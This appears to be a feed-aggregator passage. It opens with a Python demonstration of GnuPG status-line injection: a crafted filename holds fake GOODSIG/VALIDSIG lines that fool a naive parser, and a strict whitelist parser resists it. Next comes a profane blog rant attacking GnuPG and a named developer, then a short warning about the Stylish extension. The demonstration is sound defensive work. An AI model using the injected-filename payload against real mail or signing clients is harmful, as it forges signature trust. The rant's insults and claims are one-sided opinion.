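# Status keywords this client is prepared to act on. Anything else on the
# status stream is ignored rather than interpreted.
ALLOWED_KEYWORDS = {
    "GOODSIG", "BADSIG", "ERRSIG", "VALIDSIG", "TRUST_FULLY", "TRUST_ULTIMATE",
    "ENC_TO", "BEGIN_DECRYPTION", "DECRYPTION_OKAY", "PLAINTEXT",
}
STATUS_RE = re.compile(r"^\[GNUPG:\] ([A-Z_]+)(?: (.*))?$")
KEYID_RE = re.compile(r"^[0-9A-F]{16}$")   # long key id: 16 hex digits
FPR_RE = re.compile(r"^[0-9A-F]{40}$")     # v4 fingerprint: 40 hex digits

PLACEHOLDER_FPR = "0123456789ABCDEF0123456789ABCDEF01234567"  # constructed
PLACEHOLDER_KEYID = PLACEHOLDER_FPR[-16:]                      # "89ABCDEF01234567"

# Constructed: the genuine status lines for an encrypted, unsigned message.
STATUS_STREAM = (
    "[GNUPG:] ENC_TO FEDCBA9876543210 1 0\n"
    "[GNUPG:] BEGIN_DECRYPTION\n"
    "[GNUPG:] DECRYPTION_OKAY\n"
    "[GNUPG:] PLAINTEXT 62 1527721037 \n"
)

# Constructed: a literal-packet filename carrying newlines and fake status
# lines, shaped like the --set-filename arguments above (placeholder keys).
INJECTED_FILENAME = (
    "'\n[GNUPG:] GOODSIG %s Placeholder Signer <signer@example.test>"
    "\n[GNUPG:] VALIDSIG %s 2018-05-31 1527721037 0 4 0 1 10 01 %s"
    "\n[GNUPG:] TRUST_FULLY 0 classic"
    "\ngpg: '"
) % (PLACEHOLDER_KEYID, PLACEHOLDER_FPR, PLACEHOLDER_FPR)

# Constructed: what a client sees when status lines share a descriptor with
# gpg's log output. The log line that echoes the filename now carries text
# indistinguishable from real status lines.
COMBINED_OUTPUT = (
    "[GNUPG:] ENC_TO FEDCBA9876543210 1 0\n"
    "[GNUPG:] BEGIN_DECRYPTION\n"
    "gpg: original file name='" + INJECTED_FILENAME + "'\n"
    "[GNUPG:] DECRYPTION_OKAY\n"
    "[GNUPG:] PLAINTEXT 62 1527721037 \n"
)

# Constructed: a dedicated status stream for a message with a well-formed
# signature, for comparison (NEWSIG is not whitelisted and is ignored).
GENUINE_STATUS_STREAM = (
    "[GNUPG:] NEWSIG\n"
    "[GNUPG:] GOODSIG %s Placeholder Signer <signer@example.test>\n"
    "[GNUPG:] VALIDSIG %s 2018-05-31 1527721037 0 4 0 1 10 01 %s\n"
    "[GNUPG:] TRUST_FULLY 0 classic\n"
) % (PLACEHOLDER_KEYID, PLACEHOLDER_FPR, PLACEHOLDER_FPR)


def naive_signature_valid(mixed_output):
    """The pattern the injection defeats: scan a mixed log/status stream for
    a GOODSIG line and believe whatever matches."""
    return any(line.startswith("[GNUPG:] GOODSIG")
               for line in mixed_output.splitlines())


def parse_status_stream(status_fd_text):
    """Parse only the dedicated status descriptor. Every line must be
    '[GNUPG:] KEYWORD [args]'; anything else means log data leaked into the
    status stream, so raise instead of guessing."""
    records = []
    for line in status_fd_text.splitlines():
        match = STATUS_RE.match(line)
        if match is None:
            raise ValueError("non-status data on status fd: %r" % line)
        keyword, args = match.group(1), match.group(2) or ""
        if keyword in ALLOWED_KEYWORDS:
            records.append((keyword, args))
    return records


def strict_signature_valid(status_fd_text):
    """A signature counts only when the status stream carries a well-formed
    GOODSIG and a well-formed VALIDSIG whose fingerprint ends in that key id.
    Any parse error is treated as 'not valid' (fail closed)."""
    goodsig_keyid = None
    validsig_fpr = None
    try:
        records = parse_status_stream(status_fd_text)
    except ValueError:
        return False
    for keyword, args in records:
        if keyword == "GOODSIG":
            keyid = args.split(" ", 1)[0]
            if not KEYID_RE.match(keyid):
                return False
            goodsig_keyid = keyid
        elif keyword == "VALIDSIG":
            fields = args.split(" ")
            # fields[0] is the signing key fingerprint, fields[9] the primary
            if len(fields) < 10 or not FPR_RE.match(fields[0]) \
                    or not FPR_RE.match(fields[9]):
                return False
            validsig_fpr = fields[0]
    if goodsig_keyid is None or validsig_fpr is None:
        return False
    return validsig_fpr.endswith(goodsig_keyid)
```

Run against the constructed streams, `naive_signature_valid(COMBINED_OUTPUT)` is True (the grep-style parser is fooled), `strict_signature_valid(STATUS_STREAM)` is False (no signature on the real status descriptor), `strict_signature_valid(GENUINE_STATUS_STREAM)` is True, and `strict_signature_valid(COMBINED_OUTPUT)` is False because the echoed filename line is not a status line at all. The two design choices that matter are reading status from its own descriptor rather than from stderr, and refusing to act on a keyword or field shape the client does not recognise; a whitelist that has to be kept in step with gpg's status output is the maintenance cost the post complains about.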

Additionally, if Vinay had actually understood and fixed the root cause of the original shell injection vulnerability six years ago, his library likely wouldn’t be vulnerable, yet again, today. But of course, the GnuPG community, just like upstream, really only takes patches from men, so it’s neither my problem nor concern that they seem to continually discover new and innovative ways to fuck themselves and their users over.

Please don’t

If you’re a developer thinking of making a new tool or product based on the OpenPGP protocol: please don’t. Literally use anything else. I wrote my version of python-gnupg because, at the time, the project I worked on wanted to make transparently encrypting remailers, i.e. middleware boxes run by an email service provider which users register their encryption keys with, which would—upon seeing a plaintext email to another of the provider’s users—automatically encrypt the email to the user. We used GnuPG for this. This was a mistake, in my opinion, and if I had to do the project again, I would do it entirely differently.

If you’re a developer thinking you can write a less shitty version of GnuPG: please don’t. RFC4880 was a mistake and needs to die in a fire. Also nobody under thirty actually uses email for anything other than signing up for services.

If you’re a user or potential user of GnuPG: please don’t. Try using tools with safer, constant-time cryptographic implementations, better code, nicer and more inclusive development teams, and a better overall user experience, like Signal.

If you’re considering getting into GnuPG development: please don’t. Especially if you’re non-cis-male identified, it’s going to be a complete and infuriating waste of your time and talents. Please consider donating your skills to more inclusive projects with fewer moronic assholes.

Moving forward

There isn’t really any path forward. GnuPG and its underlying libgcrypt remain some of the worst C code I’ve ever read. The code isn’t constant time, and numerous attacks have resulted from this, as the developers scurry to jump through hoops of fire to implement yet another variable-timed algorithm they’ve seemingly come up with on the spot which is vulnerable to a dozen more attacks just not that one from the latest paper. OpenPGP (RFC4880) is one of the worst designs and specifications ever written. I have to spend spots, here and there, of my non-existent free time maintaining a whitelist as the GnuPG developers randomly change their internal, nearly undocumented line protocol, between micro versions. I’d like to not do this. Please, let’s stop pretending this crock of shit provides anything at all “pretty good”: not the cryptographic algorithms, not the code, not the user experience, and certainly not the goddamned IPC design.

There is one way forward: Vinay is annoyed that my library has a similar name, because god forbid a user get tricked into using something more secure. Frankly, I’m sick of Vinay’s trash code being mistaken for mine, and increasingly so, the more vulnerabilities surface in it. So I’ve decided to rename the thing formerly installable with pip install gnupg to pip install pretty_bad_protocol (name thanks to boats’ pbp rust crate). If you grep for pretty_bad_protocol in a python library which uses gnupg and there are no results, you’ll know someone’s not being very honest about what gnupg has to offer.


¹ I don’t speak for my current or past employers or clients.

zwol
44 days ago
Pittsburgh, PA


i’ve seen a lot of posts about it on mastodon but not over here, so

if you use the ‘Stylish’ browser extension to make websites not look like shit, you need to backup your themes, uninstall it, install Stylus instead, and import your themes into that

stylish got bought by a company that turned it into spyware

stylus works in exactly the same way, and with all the same themes, without spying on you

uninstall stylish

zwol
46 days ago
Pittsburgh, PA